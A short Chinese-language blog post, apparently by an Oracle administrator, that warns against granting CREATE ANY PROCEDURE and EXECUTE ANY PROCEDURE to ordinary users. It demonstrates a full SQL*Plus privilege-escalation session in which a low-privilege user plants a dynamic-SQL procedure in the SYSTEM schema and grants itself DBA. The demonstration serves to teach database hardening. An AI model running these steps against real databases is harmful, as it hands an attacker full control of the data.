Oracle: 禁忌给一般用户授权create any procedure、execute any procedure

  给一般用户授 create any procedure、execture any procedure 这2个权限是很不安全的事。

因为授权后，通过一些处理，该用户可以取得dba权限，请一定注意。

 

下面是实验过程：

SQL> create user hacker identified by bbk;

User created.

SQL> grant create session to hacker;

Grant succeeded.

SQL> grant create any procedure,execute any procedure to hacker;

Grant succeeded.

 

 

SQL> conn hacker/bbk
Connected.

SQL> show user
USER is "HACKER"

SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE

 

SQL> create procedure system.h1(h1_str in varchar2) as
2 begin
3 execute immediate h1_str;
4 end;
5 /

Procedure created.

 

SQL> execute system.h1('grant dba to hacker');

PL/SQL procedure successfully completed.

 

SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE

 

SQL> conn hacker/bbk
Connected.

SQL> select * from session_privs;

PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER

...................................

161 rows selected.

 

SQL> select * from session_roles;

ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE